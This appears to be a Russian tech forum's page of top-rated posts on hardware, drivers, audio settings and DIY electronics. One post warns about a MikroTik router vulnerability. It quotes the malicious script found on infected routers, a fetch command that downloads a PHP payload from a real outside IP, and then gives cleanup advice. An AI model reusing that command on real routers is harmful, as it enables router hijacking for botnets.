Jump to content
СофтФорум - всё о компьютерах и не только

Leaderboard


Popular Content

Showing content with the highest reputation since 08/21/18 in all areas

  1. 2 points
    Что-то "полезное" есть только до рекомендации отключить "Windows Firewall", но шанс очень мал. Сокращайте количество открытых вкладок или добавляйте оперативной памяти. Файл подкачки случаем не отключен?
  2. 2 points
    А то! :) Привет! Давненько тебя не видно было. Как дела? Новый год с елкой будешь отмечать?
  3. 1 point
  4. 1 point
    У меня поначалу возникло предположение, что раз устройство старое, то возможно это адаптер беспроводных клавы или мыши, но только не Блютус, и не Вайфай, а что-то своё. Дело в том что массовые в наше время беспроводные мыши не всегда были такими как сейчас. У меня в своё время был комплект клава + мышка, вообще работающие на CB (PS: Си-Би) диапазоне, 27,120 Мгц, если не ошибаюсь. Но с другой стороны, что-то я не помню, что происходило с компом, если включить такой адаптер без клавы и мыши поблизости, вроде бы и ничего не происходило. Не помню требовал ли такой адаптер драйверов, и видно было ли его как-то. Вроде бы нет. То есть определялись клава и мышка, но не адаптер. Хотя давно то было, не помню. На CB конечно такой относительно маленький девайс вряд ли работал, но вот на 433 Мгц, там где сидят разные автомобильные и другие сигнализации, и всякие пульты управления, - вполне вероятно. Загуглил нечто похожее - результатов ноль. Так что в печку этот девайс, что бы не смущал честнОй народ.
  5. 1 point
    Если не сломан, так как оборудование под win не видит(ну никак). Можно под Linux -ом попробовать(консольно).... Также возможно это донгл (ключ) зашиты к лицензионной программе - оборудованию (1С, каталоги запчастей, медицинское....).
  6. 1 point
    В подавляющем большинстве случаев такое поведение настраивается через Панель управления аудиодрайвером. Лично я - поступил проще. Дабы не заморачиваться, просто сунул в аудиовыход вот такую штуку На самом деле - есть несколько вариантов, в том числе и такой - И такой...
  7. 1 point
    Немного не понял, что нужно-то, что бы колонки с наушниками работали одновременно, я например это так понял. Не берусь утверждать, но скорее всего звук перенаправляет софтина от аудиокарты. Или если таковой нет, может быть можно поискать стороннюю программу. Но тут я не советчик.
  8. 1 point
    Да, есть такое дело. Это всё зависит ИМХО от того какая звуковая карта, и драйвера и софт на неё. У меня например так: когда подключаю наушники, допустим в передний разъём, при том что в задний разъём уже включены колонки, вылазит всплывающее окно, которое спрашивает, что со всем этим делать. Как видим выбраны наушники, но по логике я могу подключить что угодно. А если например поставить галки на "наушники" и на "выход на передние динамики" (так у меня), ну или при сложной акустике на какие-то другие динамики, то можно заставить звук идти на все выбранные устройства. Но я это проверять не буду, т.к. меня такая ситуация устраивает, я подключаю наушники только тогда когда они нужны, а когда они нужны - колонки не нужны. Так что найдите программу, управляющую вашей картой. У меня она называется как видно RealtekHD, у вас может быть по-другому, и действуйте через неё.
  9. 1 point
    Это может быть какой-то лицензионный ключ. Или не лицензионный, а какой-то другой, или что-то такое, завязанное на безопасность - либо для управления чем-либо, либо для получения доступа куда-то, вроде пропуска. Сейчас загуглил, вот например ключ от Лексуса: А это так вообще, "Sony PCSA-MCG106 - Лицензионный ключ на 6 точек многоточечной ВКС для PCS-XG100 и PCS-XG77", кто знает тот понимает, я лично ни то, ни другое. И такого барахла, когда непонятно что с USB портом - пруд пруди. И естественно если их создатели не полные идиоты, получить доступ к такой штуке средствами Винды будет нереально.
  10. 1 point
    Можно в диспетчере устройств порыться в USB-концентраторах (там обычно на каждый порт отдельное устройство "Корневой USB-концентратор" присутствует). У них на вкладке "Питание" прописываются подключённые к порту устройства, двойным кликом можно открыть свойства подключённого устройства, а оттуда уже значения VEN/DEV достать.
  11. 1 point
    Не это: http://www.premieraccessorygroup.com/index.php?p=our-brands&brand_id=27 ???
  12. 1 point
    Всё таки я склоняюсь к мысли что дело тут в ОС, а не в самом диске D. Может быть попробовать зайти в диспетчер задач, там могут работать какие-то процессы от недоудаленных антивирусов. Ну и поубивать их. (Современные антивирусы хуже прилипал каких-то, я как-то раньше пытался корректно удалить AVG Free, так и не смог. "Внутренняя безопасность" антивируса пресекает любые попытки помешать его работе, даже со стороны собственного деинсталлятора). Так же можно зайти в Службы, и посмотреть что связано с антивирусами. Ну и вообще, куда только можно. Насчет переустановки Винды так же не возражаю, при чем не исключаю что если переустановить Винду, то проблемы с диском D решатся сами собой.
  13. 1 point
    Бывает так, что какие-то файлы - используются внутренними процессами ОС, и потому - отказываются удаляться. Способы преодолеть подобное - есть. 1) Загрузить ОС в безопасном режиме, попробовать удалить файл. 2) Запустить машину под Live-версией Linux, хоть бы и той же Ubuntu - записывается bootable-флэшка с Ubuntu, произвести загрузку ОС с флэшки, найти и удалить файл. 3) Утилитка по имени Unlocker.
  14. 1 point
    ssssadad где покупали диск с Windows 7, можете фото купленной коробки прицепить? И, если не секрет, примерно за какую цену был куплен этот диск? Это многое прояснит. Драйверы следует качать с официального сайта производителя ноутбука. Очень часто производители не выкладывают драйверы устройств, которые уже присутствуют в поздних версиях Windows. Никакие утилиты для автоматической установки/обновления драйверов (кроме тех, что предлагаются производителем ноутбука) использовать не рекомендуется. К тому же, подобные утилиты, как правило, устанавливают только голые драйверы, в то время как многие устройства (например, звуковые карты), помимо самого драйвера, обычно требуют ещё дополнительный (заточенный для конкретного устройства) софт для управления и настройки этих устройств.
  15. 1 point
    Когда научимся пользоваться интернетом, а? Вот сейчас чисто из спортивного интереса, зашел на сайт МТС, естественно мой местный "филиал". Там выбрал "смартфоны", сортировка по увеличению цены. Самое дешевое устройство подпадающее под понятие "смартфон", это Digma Vox V40 8Gb Black. Цена у него - 2190 руб. То есть почти подпадает под техзадание. https://shop.mts.ru/product/smartfon-digma-vox-v40-8gb-black/specs Я бы не стал тут шашкой махать, в духе плохой это смартфон или хороший, кому-то может и хороший, кому-то и плохой. Разбираться надо. Покупать этот, или какой-то другой подобный телефон что бы сделать подробный обзор я не собираюсь. Себе бы я его не купил конечно, но вот был бы у меня внук-младший школьник, то возможно. Правда он бы этим телефоном мне в голову запустил. Уважаемый, у меня смартфон за 30 тыс, и я его каждый день заряжаю, и не вижу в том ничего плохого. А вы хотите купить за 2 тыс, и раз в неделю заряжать? Power bank в помощь.
  16. 1 point
    На ноуте у меня Семёрка - Скайп работает нормально. Версию сейчас не подскажу, потому как ноут - в Городе, а я - в деревне...
  17. 1 point
    У меня - не сообщает об отсутствии связи, но - может часами пытаться сконнектиться. Более ранние версии - "работают" как штатная новая, либо "не поддерживаются ОС" - у меня Десятка, лицензия. Пляски с совместимостью, Административным запуском - всё едино. В Отзывах - писал, на MSDN - писал - толку ноль. Впрочем, после того, как M$ купила Skype - он с каждым обновлением становился всё более унылым гуано. "Доулучшались"...
  18. 1 point
    Там все, что угодно может быть засрано вирусом, который вы словили, установив пресловутый "драйвер-пак". Какие-нибудь корневые экзешники загажены и фигушки вам удастся их вычистить, потому как они наверняка мимикрировали под системные и ОСь их ни за что удалять не станет, даже если антивирусом пройтись. Потому и говорю: единственный надежный вариант это - снос раздела и чистая установка винды. Так оно надежнее будет.
  19. 1 point
    Раз уж начался вечер воспоминаний..... Песня про DOS. Текст Леонид Каганов, музыка Юрий Шевчук.
  20. 1 point
    Ставил на Dell-3168 win7prox32. Многих дров знаю нет, но всё работает неплохо. Разницы с родной win10prox64 под которую и разрабатывался проц, не заметил без этих дров. Напоролся сам с этим Solution driver pack на резкий процесс нарастающего разгона проца. В итоге, чуть не спалил проц. Пришлось заново ставить винду и больше не кидать этот драйвер. Он потом откуда то с инета прилетел. Бывает и мелкософт суёт не те дрова, а бывает и офсайт Dell тоже может не то, что надо всунуть. Собственно, всё методом проб и ошибок и изучения доков.
  21. 1 point
    + Текстовый файл с требованием выкупа тоже прикрепите к следующему сообщению.
  22. 1 point
    Знаете, граждане... Лично я - пока прекрасно себя чувствую на AM3+ сокете, четырёхголовом камне и видюшкой HD7870. Последняя Metro: Exodus нормально работает на примерно 45-57 FPS, чего более чем достаточно. Да, настройки - Medium, но лично меня - больше интересует игра как таковая, а не пальцегнутие по поводу настроек... Не, кто б мне денег поболе дал - я бы и Штеуд'а последнего взял, али Райзена... Но - хватает головы просто всё нормально настроить, исходя из имеющегося. То бишь, как по мне - лучше за терпимые деньги взять годовой давности ТОП, который ещё лет пять будет хорош, нежели за большие бабки брать сейчас полутоп, который что ныне середняк, что потом - ещё того хуже...
  23. 1 point
    Судя по скриншоту система видит только цифровой вывод звука (через HDMI). Попробуйте в диспетчере устройств для "Устройства с поддержкой High Definition Audio" посмотреть другие доступные совместимые драйверы (там иногда системой предлагается несколько вариантов). Если ничего подходящего нет, создайте точку восстановления системы и попробуйте подсунуть в диспетчере устройств для этого устройства драйвер от Windows 7 (той же разрядности, разумеется).
  24. 1 point
    Спасибо. Взаимно всем всего самого нилучшего ** Когда идёт не по прямой, А вечные кривые. Тогда проблемы с головой, Ни раз не бытовые. А если вечно прямо, то – Лечиться нужно срочно. Могу поспорить – рупь за сто. Ты сумасшедший точно. Равны, что гений, идиот – Болезнь (тут на латыни). Нормальным будет только тот, Кто где-то в середине. ***
  25. 1 point
    Загрузка за 5 секунд? На м2 винтах вообще все летает. Хорошие агрегаты, правда дорогие, зараза... Но к лету будет сильный обвал цен (прядка 30-40%) на чипы памяти (технологии развиваются, и переход на новый процесс производства принес свои положительные плоды), вместе с ними упадут цены на всю ссд продукцию. Обычные модули памяти тоже упадут в цене, правда не так сильно.
  26. 1 point
    Надеюсь планки идентичны. 1) Проверь батарейку для BIOS. 2) Выставить тайминги для планок памяти принудительно. Для спокойствия прогони memtest. глянь. не просел ли Блок питания... . Также и конденсаторы на матери.
  27. 1 point
    Немного возвращаюсь к задней (фоновой) подсветке для телевизоров (и мониторов). Всё что тут описано НЕ является Ambilight, то есть никак не не связано ни с изображением на экране телевизора (монитора), ни с его звуковым сопровождением. Применяется такая подсветка для уменьшения нагрузки на глаза, при просмотре телевизора в темноте. Я уже делал заднюю подсветку для телевизора на основе т.н. лампы настроения на трёх мультивибраторах. Работало это всё вполне сносно, но питание шло от БП на 12 вольт, который требовалось включать и выключать отдельно от телевизора. Да и эффект был всего один, хотя и непредсказуемый. Решил пойти по другому пути, а именно питание подсветки взять от USB порта телевизора. Теперь пожалуй на всех, даже самых простых и дешевых телевизорах имеется хотя бы один такой порт. Таким образом подсветка включается и выключается одновременно с телевизором. Скажу сразу - я тут ничего не изобрёл, тема эта уже давно находится что называется "в разработке". В продаже имеются RGB светодиодные ленты с питанием 5 вольт, похоже специально предназначенные для питания от USB. А так же специальные контроллеры, как с пультом ДУ, так и без него, с управлением от кнопок на самом контроллере, так же способные работать от 5 вольт. Так же есть различные прочие приблуды - коннекторы, переходники, различные удлинители, и т.п.. Контроллер в любом случае "одним концом" подключается к USB, а другим - к RGB ленте. Для начала купил полный комплект из светодиодных лент, различных удлинителей и коннекторов, и RGB контроллера с пультом дистанционного управления. Выглядит такой контроллер так: Испытания показали что работает это всё не очень надежно. Хотя имелись и положительные отзывы, возможно мне не повезло, или я что-то не так сделал. Работало это всё неустойчиво, то работает, то нет. Дальность действия пульта не особо большая. Контроллер будучи подключен к телевизору не запускался при его включении, надо было "передернуть" шнур USB. Вероятно дело в каких-то помехах по питанию, мне по крайней мере так показалось. По некоторым сведениям пульт от этого контроллера мешает телевизору, который так же реагирует на сигналы этого пульта. Хотя я сам это не наблюдал. Потому эти контроллеры с пультами были отложены в долгий ящик. Но ленты остались, как и разные прочие коннекторы и удлинители, потому был куплен контроллер без пульта. Выглядят они похоже, только на них имеются кнопки: Этот контроллер показал более надежную работу, по крайней мере кнопок слушается четко, установленные настройки сохраняются и после отключения питания. Что он может, и для чего все эти кнопки тут описывать не буду, одно могу сказать, - имеется много разных эффектов, которыми я пользоваться конечно не буду. В разных телевизорах могут быть разные порты, рассчитанные на разные токи. В моем телевизоре два USB порта. Один для флешек, выдает до 500 mA, и более мощный порт для жестких дисков выдает ток до 1А. Конечно могут быть и иные варианты, тут надо разобраться конкретно со своим телевизором, какие у него есть порты, и не превышать ток порта. Установить ток мы сможем только подбирая длину ленты. Потому если есть сомнения, желательно сначала подключить контроллер с лентой не к телевизору или компьютеру, а какому-то блоку питания с USB портом через USB-тестер, или амперметр (мультиметр), установить на контроллере белый свет (т.е. зажечь все три канала с максимальной яркостью), и подбором длины ленты установить допустимый для того или иного порта ток. Так у меня используется всего два куска ленты, горизонтально, сверху и снизу телевизора, каждая по 52 см. (Минимальный кусочек - 3,5 см). В максимальном режиме они потребляют 650 mA, потому включены в более мощный порт. Обычно ленты наклеивают сзади на сам телевизор по периметру вблизи краев. Но так делать совсем не обязательно, ленту можно разместить и за телевизором, например на стене, изнутри ниши мебельной стенки, или на каком-то другом предмете. Но таким образом, что бы был виден свет от ленты падающий на окружающие предметы, но не сама лента. Насчет цвета и различных эффектов (чисто моё мнение). Всевозможные мигания и вспышки, столь любимые китайцами, использовать крайне нежелательно. Если зритель не китаец, то повторяющийся эффект быстро надоест и вызовет раздражение и глаз и нервов. Вообще лучше использовать белый, или какой-то очень слабо насыщенный светлый цвет вроде желтого, яркостью примерно такой же как яркость экрана. Использование ярких и насыщенных цветов может привести к искажению цветовосприятия и неприятным ощущениям. Слабо насыщенный цвет, то есть слегка подкрашенный белый при помощи RGB ленты получить довольно трудно, тут лучше использовать RGBW ленту, о которой уже говорилось в этой теме. Возможно вскорости займусь чем-то подобным, с 12-вольтовой RGBW лентой, поскольку их есть у меня... пять метров. Включаться и выключаться это всё будет автоматически вместе с телевизором. Ну и как это всё реализовано у меня: Контроллер у меня не закреплен сзади, а болтается на проводах снизу: Для удобного доступа, что бы если что-то захочется поменять не лазить за телевизор. Остальное я или подписал, или так понятно. При сборке использовались только покупные узлы, пайка не применялась. Ленты закреплены на двусторонний скотч описанный в предыдущем посте.
  28. 1 point
    Не люблю круглые цифры
  29. 1 point
    Рекламы не надо.
  30. 1 point
    Не понял, а то, что я сделал, не подошло?
  31. 1 point
    Вот сейчас смотрю и думаю, - а что у него за аппарат, на чем он собирается это делать, а фиг знает, военная тайна. Сейчас скажу - сделай в Paint, а вдруг он на телефоне с Андроидом, смешно буду выглядеть. Что за фотография, там одно лицо, групповое фото, или что-то еще. Дело в том, что у фотография горизонтальная, а экран у смартфона вертикальный. Можно обрезать\ нельзя обрезать, можно повернуть\ нельзя повернуть. Исходная фотография меньше чем должна получиться, можно растянуть\ нельзя растянуть.... можно ломать мозг... и так далее. Ну в общем правильно вы поняли.
  32. 1 point
  33. 1 point
    Пропорции у исходного фото и у экрана Сяоми разные. Фото на мобиле будет обрезано, а если не обрезать, по краям будут чёрные полосы. Или промежуточный вариант - немного обрезано фото и будут по краям небольшие чёрные полосы. Объяснять, как это сделать, человеку далёкому от компа, мне в лом, проще сделать. Ссылку на фото в студию ЛС.
  34. 1 point
    Тупой тест от 'Высокого Средневековья' Веселого дня
  35. 1 point
    Я бы лучше с запасом взял, на 800 или 1000 ватт. Просто все эти характеристики могут быть завышены, или может да, выдаст этот ИБП 400, или сколько там ватт... в течении одной минуты перед тем как сгореть. Фиг знает короче как они там считают. И второе, это сейчас у тебя запросы комп и монитор, а что будет завтра? А завтра захочется повесить на него принтер, сканер, телевизор, или еще чего-то. Так что надо брать на перспективу. ИМХО конечно.
  36. 1 point
    Кавычки надо экранировать, почитайте про экранирование в VBA.
  37. 1 point
    Или можно еще с помощью Brackets - только сначала создайте наборы правил замены. Например 2 пробела заменить на один, Через регулярку отделить точку или запятую от слова и т.д. Если не ошибаюсь, в Brackets можно делать пакетные замены сразу в нескольких файлах. Например, кладете в папку 10 файлов, а потом во всех сразу делаете замены. Я так понимаю, вам тексты какие-то присылают. Если так, то это самый удобный вариант.
  38. 1 point
    Можно. Надо всего лишь заходить как локальный пользователь. Ну и, конечно, покопаться в глубине хитрозапрятанных настроек - придётся...
  39. 1 point
    Подумал - а чего бы не попытаться сделать садовый фонарик на ионисторе (суперконденсаторе). Тем более что это мне представлялось хоть и дохловатой, но довольно надежной вещью, где не надо ни за чем следить и что-то помнить. Тем более что цена всех необходимых деталей будет довольно невысокой, примерно 200 рублей без учета корпуса. При указанных номиналах и деталях длительность работы фонарика составляет примерно час - полтора, что мне представляется вполне достаточным. При желании можно попробовать добавить еще СБ или ионисторов параллельно, но я этого не делал. На фото ниже схема и внешний вид. Какого-то законченного устройства пока нет, не сезон, так что буду тестировать до весны. Батарейка для масштаба. Потребовались: один ионистор 1F х 5,5V, в корпусе "V-типа" для монтажа на плату стоймя. Одна солнечная батарея (далее по тексту СБ), размером 53х30х3 мм. Измеренные характеристики СБ (для моего частного случая): среднее напряжение в пасмурный день - 3-4 вольта. Максимальное (под прямым солнечным светом в ясный день) - до 5,5 вольт. Ток короткого замыкания средний около 5 mA, максимальный - 8-9 mA. В качестве собственно схемы фонарика используется уже описанная схема с фототранзистором ARL-5013PT, и полевиком 2N7000. Ток светодиода прижат сильнее, чем в предыдущих схемах, R2 вместо обычных 1-2k, имеет сопротивление 6,8k. Но это компенсируется установкой очень яркого светодиода типа DFL-5013UWC-20 (из оставшихся от предыдущего фонарика, который кстати жив-здоров). После сборки мне показалось что светодиод светится излишне ярко, так что можно было бы увеличить R2 где-нибудь до 10k, ну уж ладно. После сборки схемы ионистор желательно зарядить от какого-то стороннего БП напряжением 5,0-5,5 вольт. Для чего подключить БП к ионистору соблюдая полярность, и подождать примерно пять минут. Если вдруг фонарик перестал работать, то скорее всего случился глубокий разряд ионистора. Произошло это скорее всего из-за загрязнения СБ, или установки фонарика в слишком затененном месте. Страшного в этом ничего нет, просто желательно устранить причину и снова зарядить ионистор от стороннего БП, как это описано выше. Отключать СБ при заряде ионистора не нужно. Элементы внутри СБ соединены последовательно, и таким образом затенение самого малого участка равнозначно затенению всей СБ. Немного об ионисторах. Ионисторы это не силовые приборы, они нужны скорее для поддержки памяти, настроек, или часов в каких-то сложных устройствах при выключении питания. Если сказать проще, то ведут они себя как дохлая батарейка, которая всё никак не сдохнет окончательно. Умный человек сказал бы, что хоть и ёмкость у них очень большая, но и очень большой ESR, или по-русски ЭПС. Поскольку источник энергии тут слабый, при сборке следует соблюдать аккуратность. На плате не должно быть никакой грязи, иначе через неё может утекать заряд ионистора. Да и шунтирование R1 или VT1 через грязь и влагу не особо желательно. Для защиты от влаги и грязи, после сборки и проверки плату полезно протереть спиртом и покрыть прозрачным цапонлаком. На месте фонарик следует располагать так, что бы СБ была направлена вверх, и по возможности не затенялась в течении всего светового дня. Периодически СБ следует очищать от посторонних предметов, пыли, грязи. Как и у описанного выше аккумуляторного фонарика на СБ, момент прекращения заряда и начала работы не синхронизированы.
  40. 1 point
    Действительно зачем слушать ответы на свои вопросы... Можно было бы удалить пользовательские данные и система сама бы переустановилась. Но это не наш метод. Остаётся длинный путь - переустановка системы с форматированием жесткого диска...
  41. 1 point
    23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS. Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно. Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро. Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них: /tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http В файлах соответственно mikrotik.php Отключаются все запрещающие правила фаервола. Создаются задачи в планировщике по запуску скрипта. Открывается сокс-прокси на нестандартном порту. Меняются адреса днс-серверов. Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака. Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа. Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации. Ну пару советов по безопасности: IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные. Грамотно настроить фаерволл. В случае если факт взлома был зафиксирован - сменить пароль на микротик. Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533
  42. 1 point
    Увы и "Ах", но облака не использую. Вообще. В твоём же случае - подозреваю, что трабл - в провайдере, а не в камне. Прекрасно понимаю, что ни фига интересного в моих данных нет, но тем не менее - храню всё локально. Да, на разных носителях, но - ничего "дядькам" не кладу. Параноик, наверное, но те же деньги (в купюрах) - держу в банке. Стеклянной. Да, пластиковая карта есть, но - безымянная дебетовая. И лежит на ней - максимум пятёрка штук. Ибо нефиг.
  43. 1 point
    - Так-ведь можно и по морде получить, поручик! - Согласен, можно... но можно и впендюрить! Онлайн версия. Без установки плагина как раз один чат. https://skypefan.ru/online/ А тут описано, как пользовать скайп без регистрации в гостевом режиме http://skype-free.ru/skype-bez-registracii.html
  44. 1 point
    Это как сравнивать, у меня ноут раз в три-пять а то и больше, мощнее стационарного компа. Есть люди у которых вообще нет возможности иметь большой комп. Например в съёмной квартире живут. Так что теперь, об стену убиться. Почувствуй, так сказать свою неполноценность. Спорить я тут не собираюсь, кто-то не считает ноут за комп, кто-то считает смартфон за комп, его право.
  45. 1 point
    Это загрузочный раздел. Плюсы: 1. Может загружать как Windows так и Linux системы через этот раздел. 2. В зависимости от конфигурации в нём или ещё в одном разделе (на 450 Мб) хранятся утилиты для восстановления системы. 3. Необходим при использовании UEFI-загрузки и при использовании GPT вместо MBR на жестком диске (поддерживает диски большого объема, таблица разделов хранится в двух местах, что повышает устойчивость к сбоям).
  46. 1 point
    OVERLORD, в любом ПО для записи дисков есть опция "Запись из образа". При этом в программе обычно предлагается указать тот самый ISO-файл, из которого будет записываться диск. Простая запись ISO-файла на диск ничего не даст. ISO-файл представляет собой, грубо говоря, архив, внутри которого, помимо пользовательских файлов, есть ещё различные служебные участки, куда как раз таки записывается загрузчик Windows, который потом запускается при загрузке с болванки.
This leaderboard is set to Moscow/GMT+03:00


×
×
  • Create New...